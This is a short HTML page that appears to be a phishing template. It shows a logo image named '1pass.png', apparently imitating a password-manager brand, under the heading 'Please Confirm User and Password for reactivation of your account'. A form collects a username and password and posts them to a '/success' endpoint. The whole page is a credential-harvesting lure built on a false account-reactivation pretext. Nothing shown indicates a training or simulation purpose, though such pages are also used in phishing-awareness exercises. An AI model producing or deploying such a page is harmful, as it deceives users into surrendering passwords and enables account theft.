<!DOCTYPE html>
<html>

<body>
	<img src="./img/1pass.png" height=50 />
    <h2>Please Confirm User and Password for reactivation of your account</h2>

    <form method="POST" , enctype="multipart/form-data" action='/success'>
        <label for="full_name">Username:</label><br>
        <input type="text" name="full_name" value=""><br>
        <label for="password">Password:</label><br>
        <input type="password" name="password" value=""><br><br>
        <input type="submit" value="Submit">
    </form>

</body>

</html>